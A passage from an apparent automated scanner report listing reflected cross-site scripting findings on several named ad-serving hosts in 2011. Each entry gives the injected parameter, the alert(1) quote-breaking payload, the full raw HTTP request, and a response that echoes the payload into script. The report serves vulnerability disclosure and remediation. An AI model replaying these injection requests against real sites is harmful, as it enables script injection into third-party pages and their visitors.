Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:45:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII7IABEAoYASABKAEwiMaA7gQQiMaA7gQYAA..; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb91751=5_[r^208WM*c3rB20/dR9rOOE?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQFhEijVWrHZufbkdUEPGZEEHI8BNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAANAcBAgUCAAUAAAAAxxvheAAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437511%29%3Buf%28%27g%27%2C+1079%2C+1304437511%29%3Buf%28%27r%27%2C+332294%2C+1304437511%29%3Bppv%2882%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2884%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2811%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2882%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2884%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2887%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28619%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28620%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28621%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646; path=/; expires=Wed, 04-May-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`/AGF4HtVmG.cyIxd`r.W; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 03 May 2011 15:45:12 GMT
Content-Length: 527

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228?8925c';alert(1)//d2520030bec">
...[SNIP]...

6.21. http://k.collective-media.net/cmadj/cm.rev_lee/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee38'-alert(1)-'19ab35be67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_leedee38'-alert(1)-'19ab35be67/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:32 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:32 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:32 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:32 GMT
Content-Length: 8159

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64518349_1304437412","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_leedee38'-alert(1)-'19ab35be67&size=300x250&imp_id=cm-64518349_1304437412,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad
...[SNIP]...

6.22. http://k.collective-media.net/cmadj/cm.rev_lee/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8487b'-alert(1)-'4ebfefb46d0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_lee/;sz=8487b'-alert(1)-'4ebfefb46d0&01RI=0B3057BAC5C6A5A&01NA= HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT-1; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:31 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:31 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:31 GMT
Content-Length: 8077

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41783944_1304437411","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=8487b'-alert(1)-'4ebfefb46d0&01RI=0B3057BAC5C6A5A&01NA=&imp_id=cm-41783944_1304437411,11fda490648f83c&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41783944_1304437411%2C11fda490648f
...[SNIP]...

6.23. http://servedby.flashtalking.com/imp/3/15881 [124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the 124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac2fb"-alert(1)-"a54c5de421a was submitted in the 124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=ac2fb"-alert(1)-"a54c5de421a&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:36 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12187B0AA1E5A3";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:36 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)


var ftGUID_124094="12187B0AA1E5A3";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=ac2fb"-alert(1)-"a54c5de421a&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src=
...[SNIP]...

6.24. http://servedby.flashtalking.com/imp/3/15881 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca13"-alert(1)-"121437d18da was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509dca13"-alert(1)-"121437d18da HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:46 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=121863BBB2F4CF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:46 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)


var ftGUID_124094="121863BBB2F4CF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509dca13"-alert(1)-"121437d18da";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/12/124094/184545/js/j
...[SNIP]...

6.25. http://servedby.flashtalking.com/imp/3/15881 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c50"-alert(1)-"74ea3ccc27 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=83c50"-alert(1)-"74ea3ccc27&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:20 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218F3A63D70DF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:20 GMT
Content-Length: 564
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)


var ftGUID_124094="1218F3A63D70DF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=83c50"-alert(1)-"74ea3ccc27&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flash
...[SNIP]...

6.26. http://servedby.flashtalking.com/imp/3/15881 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 857f8"-alert(1)-"646183f6787 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=857f8"-alert(1)-"646183f6787&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=121823E8BDA6DF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:33 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw061007 (MII-APC/1.6)


var ftGUID_124094="121823E8BDA6DF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=857f8"-alert(1)-"646183f6787&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking
...[SNIP]...

6.27. http://servedby.flashtalking.com/imp/3/15881 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39f9c"-alert(1)-"55afaf56e4b was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=39f9c"-alert(1)-"55afaf56e4b&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:50 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218792D86C7D1";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:50 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)


var ftGUID_124094="1218792D86C7D1";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=39f9c"-alert(1)-"55afaf56e4b&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http
...[SNIP]...

6.28. http://servedby.flashtalking.com/imp/3/15881 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9762c"-alert(1)-"75177b00e03 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=9762c"-alert(1)-"75177b00e03&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:07 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218E15DFCBA8F";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:07 GMT
Cache-Control: no-cache, no-store
Content-Length: 565
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)


var ftGUID_124094="1218E15DFCBA8F";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=9762c"-alert(1)-"75177b00e03&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...

6.29. http://servedby.flashtalking.com/imp/3/15881 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/15881

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b205c"-alert(1)-"e06a7be33a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509&b205c"-alert(1)-"e06a7be33a0=1 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:59 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12183D9E4BB119";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:59 GMT
Content-Length: 568
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)


var ftGUID_124094="12183D9E4BB119";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509&b205c"-alert(1)-"e06a7be33a0=1";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/12/124094/184537/js
...[SNIP]...

6.30. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8424e"%3balert(1)//7487bfd2194 was submitted in the action parameter. This input was echoed as 8424e";alert(1)//7487bfd2194 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD8424e"%3balert(1)//7487bfd2194&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:30 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:30 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD8424e";alert(1)//7487bfd2194";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

